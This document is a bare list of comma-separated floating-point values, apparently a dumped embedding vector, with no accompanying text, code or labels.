-0.013331858441233635, -0.00635260296985507, 0.030437404289841652, -0.03677279129624367, 0.005150945391505957, 0.016595959663391113, 0.013758808374404907, 0.03148411959409714, -0.03476199507713318, 0.007740190718322992, 0.007767735980451107, 0.01837262324988842, -0.01589355804026127, -0.023454705253243446, -0.01813848875463009, -0.00031095906160771847, -0.004266057163476944, -0.027531389147043228, -0.00880756601691246, -0.0035034003667533398, 0.008022528141736984, 0.008841997012495995, 0.029831411316990852, 0.026842759922146797, -0.011314175091683865, 0.013717491179704666, 0.0217882227152586, -0.012539935298264027, -0.0025203824043273926, -0.01255370769649744, -0.0136004239320755, 0.031291306018829346, -0.01813848875463009, 0.009103676304221153, 0.04222673550248146, 0.023303207010030746, 0.02834397181868553, 0.038205139338970184, 0.006163230165839195, 0.06726528704166412, -0.023137936368584633, -0.0022982994560152292, 0.007161742076277733, 0.007203059736639261, 0.04555969685316086, 0.025727180764079094, -0.021774450317025185, -0.040188390761613846, 0.00268565327860415, -0.022504396736621857, -0.007237491197884083, -0.08417801558971405, 0.015769604593515396, 0.013586651533842087, -0.016100147739052773, -0.007526715751737356, -0.02381279319524765, -0.03382546082139015, -0.029528414830565453, 0.034596722573041916, -0.0232067983597517, 0.014970795251429081, -0.012126757763326168, 0.03415600210428238, -0.05073818936944008, -0.03484462946653366, 0.005966970697045326, 0.036690156906843185, 0.019102569669485092, 0.013813898898661137, 0.012877363711595535, -0.015604333952069283, -0.002048671478405595, 0.000009401400347996969, -0.021127140149474144, -0.020713962614536285, 0.018042081966996193, 0.02217385545372963, 0.046578869223594666, 0.0009210413554683328, -0.016306735575199127, 0.03286137804389, 0.004321147222071886, 0.02845415286719799, -0.013559105806052685, 0.020796597003936768, -0.0214852262288332, 0.005581338424235582, 0.006087481044232845, -0.008793792687356472, -0.009179425425827503, -0.0018541336758062243, 0.023647522553801537, 0.03732369467616081, -0.010033325292170048, -0.0035739848390221596, -0.043796807527542114, -0.055172961205244064, -0.024363696575164795, -0.01178932934999466, 0.036387160420417786, -0.0002309059345861897, 0.007740190718322992, -0.020479828119277954, -0.033302102237939835, 0.017656449228525162, 0.023840337991714478, -0.046386051923036575, 0.017945673316717148, -0.01875825598835945, -0.0006374122458510101, -0.0036876085214316845, -0.047487858682870865, -0.021967267617583275, -0.04666150361299515, 0.022697214037179947, 0.0024429115001112223, -0.004152433015406132, 0.012491730973124504, 0.012712092138826847, -0.009420445188879967, -0.02955595962703228, -0.03737878426909447, -0.03462426736950874, 0.013207904994487762, 0.022297808900475502, -0.012829159386456013, 0.004235068801790476, -0.0036015298683196306, 0.0012292028404772282, -0.06412513554096222, 0.019956469535827637, 0.05299689248204231, -0.0021261421497911215, -0.016651051118969917, -0.04173092171549797, -0.05360288545489311, 0.02152654342353344, -0.01135549321770668, -0.011217767372727394, 0.0044141123071312904, -0.0003335546934977174, 0.023096619173884392, 0.019267840310931206, 0.02373015694320202, -0.006965483073145151, -0.020975641906261444, 0.0031263758428394794, 0.0004372794646769762, -0.0402434803545475, -0.017945673316717148, -0.008545886725187302, 0.026939168572425842, -0.009971348568797112, 0.006438681855797768, -0.0007097183261066675, -0.008731815963983536, 0.007099765352904797, 0.002100318670272827, 0.014846842736005783, -0.015728287398815155, 0.006290626246482134, -0.0156731978058815, -0.0008625079062767327, 0.004500190727412701, -0.01418575830757618, 0.011286630295217037, -0.024046925827860832, -0.028164928779006004, -0.01692650280892849, -0.016485780477523804, -0.030905671417713165, -0.016830094158649445, -0.015838468447327614, -0.005471157841384411, -0.0414554700255394, 0.009936917573213577, 0.025782272219657898, -0.03027213364839554, 0.02152654342353344, 0.04982919991016388, -0.007306354120373726, 0.012601912021636963, -0.008070732466876507, -0.030795492231845856, -0.0134489256888628, 0.024170879274606705, -0.015053431503474712, -0.004610371310263872, 0.0015735173365101218, 0.020438510924577713, 0.0041558765806257725, 0.029831411316990852, -0.0006055631674826145, 0.023826565593481064, -0.01684386655688286, -0.08406783640384674, -0.005357534158974886, -0.015094748698174953, -0.01951574720442295, 0.011286630295217037, 0.04820403456687927, -0.013311199843883514, -0.010956088081002235, 0.01822112500667572, 0.013779466971755028, -0.050875913351774216, -0.01382767129689455, -0.04164828360080719, -0.005360977258533239, -0.0065901800990104675, -0.019529519602656364, -0.03682788088917732, -0.03156675770878792, -0.05299689248204231, -0.01601751148700714, 0.028399061411619186, 0.03222784027457237, 0.06544730812311172, 0.021884631365537643, 0.0050820824690163136, -0.02085168845951557, -0.007767735980451107, -0.0053781927563250065, -0.03492726385593414, 0.0014530073385685682, -0.0009468649514019489, 0.028316427022218704, 0.008676726371049881, -0.004438214469701052, -0.03602907061576843, 0.025809817016124725, -0.03798477724194527, 0.02579604461789131, -0.016554642468690872, -0.03214520588517189, 0.0755288377404213, -0.027379890903830528, 0.010412070900201797, 0.005777597893029451, -0.05170226842164993, 0.010694408789277077, -0.010653091594576836, -0.0009993729181587696, -0.0556136816740036, -0.00604616291821003, 0.0009150158730335534, 0.04602796584367752, 0.025286458432674408, -0.005264569073915482, -0.0232067983597517, -0.0025634216144680977, 0.03156675770878792, -0.025685863569378853, -0.0003772396012209356, -0.013483356684446335, -0.020287012681365013, -0.006869074888527393, -0.013097724877297878, 0.01992892473936081, 0.0008857491193339229, -0.02761402539908886, 0.02198104001581669, -0.02111336775124073, 0.013951624743640423, 0.001909224083647132, 0.02221517264842987, -0.014392347075045109, 0.019405566155910492, 0.017243271693587303, 0.01921275071799755, -0.02545172907412052, -0.0009726885473355651, -0.01477797981351614, 0.0023706054780632257, -0.007299467921257019, -0.020493600517511368, -0.005150945391505957, 0.03792968764901161, -0.02772420644760132, -0.02605772390961647, 0.009144993498921394, 0.008167140185832977, -0.005715621169656515, -0.010088415816426277, 0.02722839266061783, -0.0044313278049230576, -0.007416534703224897, -0.018703164532780647, -0.014474982395768166, 0.0030334109906107187, 0.007457852829247713, -0.023867882788181305, 0.012347118929028511, -0.027035577222704887, 0.0001961516827577725, 0.017325907945632935, -0.011307288892567158, -0.01076327171176672, 0.032916467636823654, 0.013641742058098316, -0.0024188095703721046, 0.004748097155243158, -0.023151708766818047, 0.028481697663664818, 0.00008295827865367755, 0.0048479484394192696, -0.0005474601057358086, -0.02476310171186924, -0.002652943367138505, -0.009785419330000877, -0.02461160160601139, 0.0214852262288332, 0.006906949449330568, -0.011989031918346882, -0.0006808819598518312, -0.02035587467253208, -0.009027927182614803, -0.039086584001779556, 0.005863676313310862, 0.0031625288538634777, -0.024363696575164795, -0.02707689441740513, 0.038893770426511765, 0.01367617305368185, 0.006146014202386141, 0.024790646508336067, 0.054787326604127884, -0.023840337991714478, -0.0049374704249203205, -0.001607088022865355, 0.007630010135471821, -0.012051008641719818, -0.0042626140639185905, -0.007444079965353012, -0.012374663725495338, 0.011183335445821285, -0.029941590502858162, 0.013820785097777843, -0.009737215004861355, -0.008456365205347538, 0.056467581540346146, 0.004083570092916489, -0.010790817439556122, -0.01097674760967493, 0.017739083617925644, 0.0006210573483258486, -0.013386948965489864, 0.0046654618345201015, 0.006844972725957632, -0.015397746115922928, -0.020452283322811127, 0.00358431413769722, 0.021237319335341454, 0.027131984010338783, -0.029225416481494904, -0.0005616630660369992, 0.009633920155465603, -0.013159701600670815, -0.006917278748005629, 0.0013109776191413403, -0.012622570618987083, -0.004045695532113314, -0.02996913716197014, 0.006022061221301556, 0.049498654901981354, -0.0082153445109725, -0.035285353660583496, 0.020259466022253036, -0.005343761295080185, 0.005653644446283579, 0.003870095359161496, 0.041483014822006226, -0.020149286836385727, -0.018854662775993347, 0.012966885231435299, -0.013510902412235737, 0.009454877115786076, 0.004231625702232122, 0.001754282508045435, -0.0069689261727035046, -0.010866566561162472, 0.01201657671481371, 0.0213337279856205, 0.012202506884932518, 0.007974324747920036, 0.05999336391687393, -0.0217882227152586, -0.017215726897120476, -0.024859508499503136, -0.015494153834879398, -0.021292410790920258, 0.0140549186617136, 0.01616900973021984, -0.017711538821458817, 0.0012533048866316676, -0.02450142242014408, -0.01278095506131649, 0.008731815963983536, 0.019846288487315178, -0.04241954907774925, -0.01268454734236002, -0.035312898457050323, -0.01513606682419777, -0.003394941333681345, 0.008339297957718372, 0.001876514172181487, -0.0024997235741466284, -0.022449307143688202, 0.02819247357547283, 0.02567209117114544, 0.008477023802697659, 0.022766076028347015, 0.0011999361449852586, 0.009902485646307468, -0.032696109265089035, -0.00044115298078395426, 0.014530072920024395, -0.017201954498887062, -0.0006950849783606827, 0.0014659190783277154, -0.0032382782083004713, 0.007402762304991484, -0.011045609600841999, 0.02711821161210537, 0.017477406188845634, -0.005956641398370266, 0.00131011672783643, -0.046468690037727356, -0.018964843824505806, 0.006349159870296717, -0.0073545584455132484, -0.011927055194973946, -0.0009468649514019489, 0.0009279276710003614, 0.010184823535382748, -0.016031283885240555, -0.014378574676811695, 0.021622952073812485, -0.007065333891659975, 0.013111497275531292, -0.01893729902803898, 0.03156675770878792, 0.01571451500058174, 0.017711538821458817, 0.024666693061590195, 0.006641827058047056, -0.0531897097826004, 0.0405464805662632, -0.019198978319764137, -0.0015554408309981227, -0.03768178075551987, -0.027793068438768387, -0.029032601043581963, -0.021540317684412003, -0.011630944907665253, -0.0038046755362302065, 0.0020245693158358335, 0.002582358894869685, -0.035009901970624924, -0.03178711608052254, 0.004224739037454128, 0.010900997556746006, -0.014750434085726738, 0.01306329295039177, -0.051784906536340714, 0.015563016757369041, 0.018496576696634293, -0.01616900973021984, -0.002293134806677699, 0.019956469535827637, -0.02845415286719799, -0.03883867710828781, 0.00238609965890646, -0.011899510398507118, -0.013104611076414585, -0.019116342067718506, -0.02631940320134163, -0.012526162900030613, 0.014695344492793083, 0.016595959663391113, -0.018152261152863503, -0.051178909838199615, -0.002711476990953088, -0.00738898990675807, 0.01260879822075367, 0.0022328796330839396, -0.007712645456194878, 0.032999105751514435, -0.010115960612893105, -0.001376397325657308, 0.004934027325361967, 0.005474600940942764, 0.02381279319524765, -0.03624943271279335, 0.02046605572104454, 0.004785971716046333, 0.02567209117114544, 0.0026236767880618572, -0.021498998627066612, -0.006146014202386141, -0.027682887390255928, 0.021595407277345657, -0.0062871831469237804, 0.021857086569070816, -0.028784694150090218, -0.01619655452668667, -0.01386210322380066, 0.021498998627066612, -0.026567308232188225, 0.0008315196027979255, -0.023372070863842964, 0.018923526629805565, -0.003009309060871601, -0.020410966128110886, -0.013820785097777843, -0.018386395648121834, 0.012319574132561684, -0.010095302015542984, -0.009950689971446991, -0.03288892284035683, 0.017504950985312462, -0.028619423508644104, 0.033605098724365234, -0.012877363711595535, 0.02784815989434719, 0.03534044325351715, -0.0036290751304477453, 0.00021089264191687107, 0.039609942585229874, 0.03666261211037636, -0.021512771025300026, 0.0023723270278424025, 0.011947713792324066, -0.00783659890294075, -0.02452896721661091, 0.0010441337944939733, -0.02441878616809845, 0.02616790495812893, -0.00789168942719698, 0.030602674931287766, -0.0018782357219606638, 0.019570838660001755, 0.006831200327724218, 0.0014512857887893915, 0.0028578105848282576, 0.028922419995069504, 0.018042081966996193, 0.015728287398815155, -0.032310474663972855, 0.030409859493374825, 0.047680675983428955, 0.0264433566480875, -0.0038253343664109707, -0.014144441112875938, 0.0381225049495697, 0.022463079541921616, 0.020245693624019623, -0.0048169600777328014, -0.006500658113509417, -0.0021209775004535913, -0.02050737291574478, -0.018703164532780647, -0.05263880640268326, -0.0020039104856550694, 0.010474047623574734, -0.005292114336043596, -0.03074040077626705, 0.05789992958307266, -0.01947443000972271, -0.008449478074908257, -0.0034310943447053432, -0.027779296040534973, -0.017436087131500244, -0.00022810837253928185, 0.02070019021630287, -0.011142018251121044, -0.012698319740593433, 0.018923526629805565, 0.002282805275171995, 0.02834397181868553, 0.013304313644766808, 0.033522460609674454, -0.029308052733540535, -0.012946226634085178, -0.0008155950345098972, -0.008594091050326824, 0.0021468009799718857, 0.002133028581738472, 0.009716556407511234, 0.01038452610373497, -0.01776663027703762, -0.04861721023917198, -0.0005745748640038073, -0.029500868171453476, 0.017353452742099762, 0.006676258519291878, -0.01066686399281025, -0.0024360253009945154, 0.009571943432092667, -0.010446502827107906, -0.006084037479013205, -0.01457139104604721, -0.027324801310896873, 0.052170537412166595, -0.012491730973124504, 0.009998894296586514, 0.014516300521790981, 0.019033707678318024, 0.0013402443146333098, 0.0011457066284492612, -0.026870306581258774, -0.038783587515354156, 0.03167693689465523, -0.01684386655688286, -0.006662486121058464, -0.030685311183333397, -0.004073240794241428, 0.007664441596716642, 0.0083668427541852, -0.008373728953301907, 0.016954047605395317, 0.0035946436692029238, 0.011493219062685966, 0.023440932855010033, -0.00738898990675807, -0.003455196274444461, -0.03655242919921875, -0.012119871564209461, -0.013180360198020935, -0.029886500909924507, -0.019047480076551437, -0.0432734489440918, 0.04073929414153099, -0.008821338415145874, 0.007147969678044319, 0.00962014775723219, 0.02411578968167305, -0.014736661687493324, 0.017546268180012703, -0.0156731978058815, 0.0011887459550052881, 0.034706905484199524, -0.0270493496209383, 0.016003739088773727, -0.003932071849703789, 0.005312772933393717, 0.016527097672224045, 0.024294832721352577, -0.030823037028312683, 0.01962592825293541, -0.017931900918483734, -0.016706140711903572, -0.007041232194751501, 0.028509242460131645, -0.018537893891334534, 0.006597066298127174, -0.005243910476565361, 0.017973218113183975, -0.004441657569259405, -0.017945673316717148, -0.013104611076414585, -0.013641742058098316, -0.009881827048957348, -0.005278341937810183, -0.00905547197908163, -0.019309159368276596, -0.010295004583895206, -0.03503744676709175, -0.002022847766056657, -0.001969479024410248, 0.02126486599445343, -0.03795723244547844, -0.0216367244720459, 0.033219464123249054, 0.009372241795063019, 0.021815769374370575, -0.03586380183696747, 0.006893177051097155, 0.002818214474245906, -0.014819297008216381, 0.0009132942650467157, 0.011720466427505016, -0.008070732466876507, 0.023647522553801537, -0.02198104001581669, 0.0070446752943098545, -0.0020917106885463, 0.009792305529117584, -0.0017680551391094923, 0.019681017845869064, -0.011947713792324066, -0.0074096485041081905, 0.02487328089773655, 0.009516853839159012, -0.024102017283439636, 0.012946226634085178, 0.022738531231880188, -0.019198978319764137, 0.013510902412235737, 0.01647200621664524, -0.025851134210824966, 0.030106863006949425, 0.004679234232753515, -0.015053431503474712, -0.007946779020130634, 0.02195349521934986, 0.02122354693710804, -0.013834557496011257, -0.013937852345407009, -0.043383631855249405, 0.006948267109692097, -0.024446330964565277, 0.007939892821013927, -0.0041937511414289474, 0.004710222594439983, 0.015535471960902214, -0.010921657085418701, 0.008463251404464245, 0.004190307576209307, -0.0038907541893422604, 0.007568033412098885, -0.01017793733626604, 0.003980276174843311, -0.03277874365448952, 0.004049138631671667, 0.0044313278049230576, -0.01681632176041603, -0.03726860508322716, -0.010246800258755684, 0.006455897353589535, -0.026842759922146797, -0.022766076028347015, 0.011327948421239853, 0.03319191932678223, 0.022834939882159233, 0.04481597989797592, -0.03266856074333191, -0.02894996479153633, -0.012904908508062363, -0.00761623727157712, 0.032613471150398254, -0.018014535307884216, -0.008841997012495995, 0.005849903915077448, 0.042695000767707825, -0.004889266099780798, -0.003969946410506964, 0.017394769936800003, -0.01160339917987585, -0.00844259187579155, 0.016706140711903572, -0.00478252861648798, -0.00016645455616526306, 0.019846288487315178, -0.01742231473326683, 0.011830647476017475, 0.032806288450956345, 0.005963527597486973, -0.00709287915378809, 0.0022346011828631163, 0.009998894296586514, -0.008070732466876507, -0.010026439093053341, 0.006242422387003899, 0.012746524065732956, -0.04861721023917198, -0.020975641906261444, 0.006146014202386141, 0.048589665442705154, 0.02974877506494522, -0.01313904207199812, -0.007079106755554676, -0.018799573183059692, -0.006022061221301556, 0.015301337465643883, -0.0032417213078588247, -0.007760849315673113, -0.01977742649614811, 0.026636172086000443, 0.003608416300266981, 0.030189497396349907, -0.03848059102892876, 0.018193580210208893, -0.006631497759371996, 0.012918680906295776, -0.02925296314060688, 0.018813345581293106, 0.01901993528008461, 0.011210881173610687, 0.0023602761793881655, 0.014461209997534752, -0.02137504518032074, -0.009220742620527744, -0.025011006742715836, -0.011107586324214935, -0.004131774418056011, 0.0032382782083004713, 0.010852794162929058, -0.01008152961730957, -0.007526715751737356, -0.01477797981351614, -0.0010906162206083536, 0.01981874369084835, -0.017436087131500244, -0.00018560704484116286, -0.002747630001977086, 0.01621032878756523, -0.0044141123071312904, 0.01148633286356926, -0.012147416360676289, 0.0017155471723526716, 0.014474982395768166, -0.03393564000725746, 0.011672262102365494, -0.002256981795653701, -0.004162762779742479, -0.02560322917997837, -0.03445899859070778, -0.020590009167790413, 0.008607863448560238, -0.018813345581293106, -0.013311199843883514, -0.009179425425827503, -0.03332964703440666, -0.018386395648121834, 0.05944246053695679, -0.008745589293539524, -0.032696109265089035, 0.01616900973021984, 0.0036497339606285095, -0.013820785097777843, 0.013793240301311016, 0.0063181715086102486, -0.007375217042863369, -0.004207523539662361, 0.00985428225249052, 0.003608416300266981, -0.01608637534081936, -0.001051020110026002, 0.01787680946290493, -0.0034586393740028143, 0.0026012961752712727, -0.014213304035365582, 0.0070274593308568, 0.01638937182724476, 0.004276386462152004, 0.010474047623574734, 0.007974324747920036, 0.013194132596254349, 0.01696782000362873, 0.0035120081156492233, -0.020906778052449226, -0.003646290861070156, -0.013552219606935978, -0.019557064399123192, -0.02293134666979313, 0.020975641906261444, -0.01893729902803898, -0.017201954498887062, 0.013607310131192207, -0.010811476036906242, 0.016802549362182617, 0.020176831632852554, -0.008539000526070595, -0.025162504985928535, 0.006256194785237312, -0.017174407839775085, -0.03162184730172157, -0.012870477512478828, -0.020631326362490654, -0.02111336775124073, 0.017491178587079048, 0.009454877115786076, -0.020176831632852554, -0.0026890963781625032, 0.004052582196891308, -0.016375599429011345, 0.01321479119360447, 0.011851306073367596, -0.018537893891334534, 0.012643229216337204, -0.0070068007335066795, 0.00946864951401949, -0.0167336855083704, 0.00574316643178463, -0.004651689436286688, -0.009144993498921394, -0.0009701061644591391, 0.00650410121306777, 0.005071753170341253, -0.016554642468690872, -0.007609351072460413, -0.0005087247118353844, 0.00015709349827375263, 0.017670221626758575, -0.02081036940217018, -0.010109074413776398, -0.0016002018237486482, 0.00642835209146142, 0.006001402158290148, -0.01757381297647953, -0.01901993528008461, 0.02046605572104454, -0.0048307329416275024, 0.004138660617172718, 0.023743929341435432, 0.01844148524105549, -0.007898575626313686, 0.009881827048957348, -0.023606203496456146, -0.01457139104604721, -0.0161276925355196, -0.017243271693587303, 0.016940275207161903, -0.0067726667039096355, 0.0017344844527542591, 0.01811094395816326, 0.03131885081529617, -0.016912730410695076, 0.0014159935526549816, -0.011417469941079617, -0.02620922215282917, 0.0025513707660138607, -0.015356427989900112, -0.01727081649005413, 0.02016305923461914, 0.00269081792794168, 0.017367225140333176, -0.017587585374712944, 0.0026030177250504494, -0.01718818210065365, 0.025437956675887108, -0.025548137724399567, 0.014309711754322052, 0.005385079421103001, 0.0019522634102031589, 0.006090924143791199, 0.004889266099780798, -0.051564544439315796, 0.0038666522596031427, -0.015604333952069283, 0.015287565067410469, -0.003117768093943596, 0.01395851094275713, -0.011982145719230175, -0.011114472523331642, -0.015728287398815155, -0.00016258101095445454, -0.004878936801105738, -0.008697384968400002, 0.007492284290492535, -0.009695896878838539, 0.004737767856568098, -0.01696782000362873, 0.0074991704896092415, 0.01917143352329731, -0.006115025840699673, 0.03418354690074921, -0.013813898898661137, 0.006817427463829517, -0.0005874866619706154, 0.03936203569173813, 0.0038838679902255535, 0.008945291861891747, -0.01268454734236002, -0.04233691468834877, -0.00283370865508914, -0.010171051137149334, 0.01586601324379444, 0.020521145313978195, -0.014254621230065823, -0.020438510924577713, -0.03393564000725746, -0.00804318767040968, -0.01023302786052227, 0.0044451006688177586, -0.025685863569378853, 0.02502477914094925, -0.001330775674432516, 0.009702783077955246, 0.009840508922934532, -0.034596722573041916, -0.008208458311855793, -0.027297256514430046, 0.003845993196591735, 0.004851391538977623, 0.011982145719230175, 0.020176831632852554, -0.030079316347837448, -0.007320126984268427, -0.0008108607144095004, 0.01477797981351614, 0.0063939206302165985, 0.00905547197908163, -0.0035361102782189846, -0.00396650331094861, -0.008738703094422817, -0.020094195380806923, 0.022793620824813843, 0.03272365406155586, 0.0035429964773356915, 0.0021244206000119448, -0.02038341946899891, 0.021925948560237885, -0.016871411353349686, 0.006672815419733524, 0.01023302786052227, -0.015659425407648087, -0.017780402675271034, 0.007368330843746662, -0.00037788518238812685, -0.010866566561162472, -0.0026822101790457964, -0.03536798804998398, 0.030823037028312683, 0.0030988308135420084, 0.04655132442712784, -0.007974324747920036, -0.01365551445633173, 0.00754048814997077, -0.024253515526652336, -0.015686970204114914, -0.011816874146461487, 0.006686588283628225, -0.02640203759074211, 0.03605661913752556, 0.003625632030889392, 0.03104339726269245, -0.0275038443505764, 0.015439063310623169, -0.014488755725324154, -0.0022879699245095253, -0.012808500789105892, -0.01813848875463009, 0.02996913716197014, -0.018234897404909134, -0.00492714112624526, -0.011197108775377274, 0.00014730205293744802, 0.035202715545892715, -0.012312687933444977, 0.0004996864590793848, -0.013841443695127964, -0.01684386655688286, -0.015576789155602455, -0.015535471960902214, 0.002294856356456876, -0.0165821872651577, -0.000954612041823566, -0.019612155854701996, 0.009812964126467705, 0.04142792522907257, -0.02483196370303631, 0.00709287915378809, 0.009151879698038101, -0.0010019552428275347, -0.013194132596254349, -0.019047480076551437, -0.014199530705809593, 0.0020607225596904755, -0.013249223120510578, 0.029886500909924507, -0.014392347075045109, 0.039306946098804474, -0.0031126034446060658, 0.019047480076551437, -0.01733968034386635, -0.016898956149816513, -0.011961487121880054, -0.0053162164986133575, -0.00015580232138745487, 0.023082846775650978, 0.03197993338108063, -0.018317533656954765, -0.0050132195465266705, 0.0003714292834047228, 0.025575682520866394, 0.009255174547433853, -0.019997788593173027, -0.00047773640835657716, -0.009971348568797112, -0.003336407709866762, -0.01040518470108509, -0.01293245330452919, -0.016802549362182617, 0.039086584001779556, -0.012147416360676289, 0.012588138692080975, 0.014750434085726738, -0.02620922215282917, -0.012271369807422161, -0.028288882225751877, -0.02167804352939129, -0.03156675770878792, -0.009792305529117584, -0.01958461105823517, 0.01066686399281025, -0.005360977258533239, 0.003722039982676506, -0.02711821161210537, -0.004241955000907183, 0.019570838660001755, 0.024446330964565277, -0.0006150318076834083, 0.009172539226710796, 0.011692921631038189, -0.017215726897120476, 0.0267463531345129, -0.05002201348543167, -0.004648246336728334, -0.002251816913485527, -0.01574205979704857, -0.009386014193296432, 0.002368883928284049, -0.015439063310623169, -0.00447953213006258, -0.02696671336889267, -0.019460657611489296, -0.015466609038412571, -0.00793300662189722, 0.02996913716197014, -0.01382767129689455, 0.0051199570298194885, -0.006927608512341976, -0.018083399161696434, -0.002074494957923889, 0.00816025398671627, 0.012739637866616249, -0.02955595962703228, -0.02407447248697281, -0.0034844630863517523, -0.007850371301174164, -0.02327566221356392, -0.006982698570936918, 0.0011947713792324066, 0.0010811475804075599, -0.00201079691760242, 0.004049138631671667, -0.018923526629805565, 0.00783659890294075, 0.0030936659313738346, 0.008600977249443531, 0.01477797981351614, -0.0050820824690163136, -0.00641802279278636, -0.00552624836564064, 0.0021433578804135323, 0.018303759396076202, 0.003506843466311693, 0.012119871564209461, -0.006366375833749771, 0.013021975755691528, -0.02696671336889267, 0.005168160889297724, -0.0007445801747962832, 0.00566741731017828, -0.005037321709096432, 0.028040975332260132, -0.0210307314991951, 0.010033325292170048, -0.009234515950083733, 0.009902485646307468, -0.020755279809236526, -0.0204247385263443, 0.00005452543337014504, -0.01828998699784279, 0.028591878712177277, -0.007113538216799498, 0.006700360681861639, 0.010164164938032627, -0.018772028386592865, 0.008972836658358574, 0.03156675770878792, -0.024473875761032104, -0.010604887269437313, -0.03264101594686508, -0.005853347014635801, 0.0033501803409308195, 0.012030350044369698, 0.006559191737323999, 0.017009137198328972, -0.012595025822520256, 0.021843314170837402, -0.0016535705653950572, -0.04376926273107529, -0.01008152961730957, -0.02297266572713852, -0.015315109863877296, -0.0019488201942294836, -0.007871029898524284, -0.01457139104604721, -0.026484673842787743, -0.006101253442466259, 0.022008584812283516, 0.026484673842787743, 0.01692650280892849, -0.0020503930281847715, 0.03126375749707222, -0.00908990390598774, -0.006121912505477667, 0.015810923650860786, 0.03454163298010826, -0.013930966146290302, -0.009985120967030525, 0.008222230710089207, 0.01030877698212862, -0.01795944571495056, -0.004992560483515263, -0.009138107299804688, -0.0019488201942294836, -0.010632432997226715, -0.020479828119277954, 0.006183888763189316, -0.02541041187942028, 0.0010880338959395885, 0.02612658590078354, -0.009289605543017387, -0.01262945681810379, 0.0026718806475400925, -0.022917574271559715, 0.008635408245027065, 0.017904356122016907, -0.004954685922712088, -0.009792305529117584, 0.000006832491635577753, -0.010281232185661793, 0.0029972579795867205, 0.0024360253009945154, 0.011389924213290215, 0.003341572592034936, -0.018840890377759933, -0.018055854365229607, -0.015094748698174953, -0.012581252492964268, -0.0054160673171281815, 0.02883978560566902, -0.010343207977712154, 0.015039658173918724, -0.031594302505254745, 0.015810923650860786, -0.005026991944760084, -0.006187331862747669, 0.01268454734236002, -0.00574316643178463, 0.026305630803108215, -0.005781040992587805, -0.007134196814149618, -0.004785971716046333, -0.009062358178198338, 0.005130286328494549, 0.006132241804152727, 0.019198978319764137, -0.01958461105823517, -0.002084824489429593, 0.022917574271559715, 0.020245693624019623, 0.03561589494347572, 0.008745589293539524, -0.02746252715587616, -0.027297256514430046, -0.009007267653942108, -0.0021898404229432344, -0.01696782000362873, -0.01160339917987585, 0.005960084497928619, 0.002828543772920966, -0.03297156095504761, 0.013917192816734314, 0.006039276719093323, 0.0022741975262761116, -0.004841062240302563, -0.018083399161696434, -0.0021950050722807646, 0.015728287398815155, -0.028426608070731163, 0.030602674931287766, -0.02370261214673519, 0.01255370769649744, 0.007533601950854063, -0.008786906488239765, -0.01380701269954443, 0.004369351547211409, 0.004744654055684805, -0.012863590382039547, 0.0042867157608270645, -0.004307374823838472, -0.004841062240302563, 0.006497215013951063, -0.00761623727157712, 0.026980485767126083, 0.00813959538936615, -0.007726417854428291, 0.0019970242865383625, -0.0048617213033139706, -0.013510902412235737, 0.009372241795063019, 0.010281232185661793, 0.0040147071704268456, 0.0017396491020917892, 0.016637278720736504, -0.007850371301174164, -0.008594091050326824, -0.016499552875757217, 0.019832516089081764, 0.002079659840092063, 0.007010243833065033, 0.017353452742099762, -0.01601751148700714, -0.006163230165839195, -0.008587203919887543, 0.012450413778424263, 0.00031418699654750526, 0.0010647926246747375, -0.00941355898976326, 0.008222230710089207, -0.0032038467470556498, -0.027324801310896873, -0.003608416300266981, 0.02567209117114544, 0.004524292889982462, -0.0035223376471549273, -0.025038551539182663, 0.03542307764291763, 0.005464271642267704, 0.0105911148712039, 0.007065333891659975, 0.0026546649169176817, -0.006910392548888922, 0.014681571163237095, -0.0024945586919784546, -0.0003714292834047228, -0.012657001614570618, 0.001272242167033255, 0.003400105983018875, -0.009957576170563698, 0.0005616630660369992, -0.0009348139283247292, -0.004851391538977623, -0.002251816913485527, 0.006948267109692097, 0.008318639360368252, -0.0032692663371562958, -0.00680021196603775, 0.0048617213033139706, -0.006177002564072609, 0.009372241795063019, -0.003224505577236414, -0.012085439637303352, -0.007671327795833349, -0.027985885739326477, -0.0037840167060494423, 0.00829109363257885, 0.014805524609982967, -0.0069000632502138615, -0.010184823535382748, 0.017642676830291748, 0.004011264070868492, 0.0025909668765962124, -0.022228945046663284, 0.0065385326743125916, -0.0072788093239068985, 0.008759361691772938, -0.0019229965982958674, 0.00008618622814537957, 0.012718978337943554, 0.002102040220052004, -0.00789168942719698, 0.01217496208846569, -0.01125908549875021, -0.000020430225049494766, 0.012712092138826847, 0.001812816015444696, -0.003074728650972247, -0.002723527839407325, 0.0161276925355196, -0.0029817637987434864, -0.009475535713136196, -0.0227523036301136, -0.0041834213770926, 0.002630562987178564, -0.01017793733626604, 0.006280296947807074, 0.010584228672087193, -0.006118468940258026, 0.00641802279278636, -0.017201954498887062, -0.001285154023207724, 0.004968458786606789, -0.009200084023177624, -0.020631326362490654, 0.005942868534475565, 0.003980276174843311, 0.010701295919716358, 0.0003600238705985248, -0.00804318767040968, 0.0037668009754270315, -0.011541423387825489, -0.014461209997534752, -0.014654026366770267, -0.008428819477558136, 0.00030837670783512294, 0.0012412539217621088, 0.016761230304837227, 0.0021261421497911215, 0.012051008641719818, 0.006438681855797768, 0.013145928271114826, -0.027669114992022514, 0.001919553498737514, -0.038700953125953674, -0.006307842209935188, -0.0009313707705587149, 0.012112985365092754, -0.0161276925355196, 0.00941355898976326, 0.002503166673704982, 0.010377639904618263, -0.008401274681091309, -0.0013221678091213107, -0.006586736999452114, -0.020741507411003113, 0.0029438892379403114, 0.0036428477615118027, -0.02081036940217018, 0.0003849866916425526, -0.0007346811471506953, 0.04316326975822449, 0.0232067983597517, 0.008022528141736984, -0.0232067983597517, 0.032007478177547455, -0.012519275769591331, -0.034789539873600006, -0.007760849315673113, -0.0042867157608270645, 0.000649893656373024, -0.003949287813156843, 0.0007265036692842841, 0.012154302559792995, 0.012498617172241211, 0.0001130857999669388, 0.019226523116230965, 0.0029697127174586058, -0.003894197288900614, -0.027255937457084656, 0.0026426140684634447, -0.009344696067273617, 0.009523740038275719, -0.006245865486562252, -0.015328883193433285, 0.006476556416600943, 0.01025368645787239, -0.02655353583395481, 0.013710604049265385, -0.00793300662189722, 0.013249223120510578, -0.015962421894073486, 0.0040284800343215466, 0.0035429964773356915, -0.014695344492793083, 0.03283383324742317, 0.003186631016433239, -0.016857638955116272, -0.025052325800061226, -0.0038218912668526173, -0.008001869544386864, -0.010832134634256363, -0.004221295937895775, 0.014943250454962254, -0.005440169479697943, -0.004279829561710358, 0.019942697137594223, 0.008628522045910358, 0.0028044418431818485, 0.02357865869998932, 0.011651603505015373, 0.01036386750638485, 